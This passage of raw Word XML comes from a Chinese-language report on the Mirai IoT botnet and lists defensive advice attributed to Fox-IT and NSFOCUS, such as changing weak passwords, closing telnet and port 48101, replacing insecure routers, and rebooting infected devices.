        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRDefault="008E4800" w:rsidP="009A1AB3">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00757648" w:rsidRPr="008E4800" w:rsidRDefault="00757648" w:rsidP="009A1AB3">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fox</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it给出的防护</w:t>
      </w:r>
      <w:r w:rsidR="008E4800" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>建议包括</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1473044083"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION len16 \l 2052 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[15]</w:t>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRPr="008E4800" w:rsidRDefault="008E4800" w:rsidP="008E4800">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SP应该配置其设备</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>只允许本</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ISP管理网络访问，而不对公网开放；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRPr="008E4800" w:rsidRDefault="008E4800" w:rsidP="008E4800">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>用户应替换掉</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Eir D1000等不安全设备</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRPr="008E4800" w:rsidRDefault="008E4800" w:rsidP="008E4800">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ISP和设备厂商索要安全补丁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRDefault="008E4800" w:rsidP="009A1AB3">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A5235" w:rsidRPr="008E4800" w:rsidRDefault="00DE7744" w:rsidP="009A1AB3">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>绿盟给出了</w:t>
      </w:r>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>针对原始Mirai程序</w:t>
      </w:r>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>23/2323</w:t>
      </w:r>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)的</w:t>
      </w:r>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>防护策略</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="723651466"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 李东宏16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[12]</w:t>
          </w:r>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5235" w:rsidRPr="008E4800" w:rsidRDefault="007A5235" w:rsidP="00DE7744">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修改初始口令以及弱口令，加固用户名和密码的安全性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5235" w:rsidRPr="008E4800" w:rsidRDefault="007A5235" w:rsidP="00DE7744">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>禁用48101端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5235" w:rsidRPr="008E4800" w:rsidRDefault="007A5235" w:rsidP="00DE7744">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>关闭telnet连接（使用了23端口）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5235" w:rsidRPr="008E4800" w:rsidRDefault="007A5235" w:rsidP="00DE7744">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox工具只允许特定用户进行使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRDefault="008E4800" w:rsidP="008E4800">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="540" w:firstLine="300"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A1AB3" w:rsidRDefault="008E4800" w:rsidP="008E4800">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="540" w:firstLine="300"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>已经感染</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>变种Mirai(7547/5555)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的设备</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>绿盟认为只需</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设备并等待15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分钟以上，再次开启设备即可清除</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>感染</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1876966205"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 绿盟科16 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRDefault="008E4800" w:rsidP="008E4800">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
